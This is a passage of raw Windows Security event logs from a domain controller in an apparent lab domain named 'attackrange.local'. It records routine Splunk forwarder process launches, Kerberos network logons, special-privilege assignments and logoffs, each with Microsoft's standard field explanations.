Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:30:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264701
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x56c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:30:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264703
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1908
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:30:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264704
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17ec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:30:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264706
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1378
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:30:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264705
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:30:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264709
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x856799
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:30:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264708
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x856799
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53607
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:30:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264707
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x856799
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:31:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264710
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:31:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264712
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1050
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:31:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264711
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:31:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264713
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1610
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:31:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264714
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x858153
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 53884
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:31:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264715
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1590
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:31:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264717
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xfe8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:31:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264716
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xaa0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:31:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264719
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x859578
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53613
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:31:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264718
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x859578
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:31:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264720
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x858153
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:31:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264721
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x859578
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:31:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264724
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x85A314
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:31:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264723
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x85A314
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53622
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:31:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264722
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x85A314
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:32:07 PM
LogName=Security
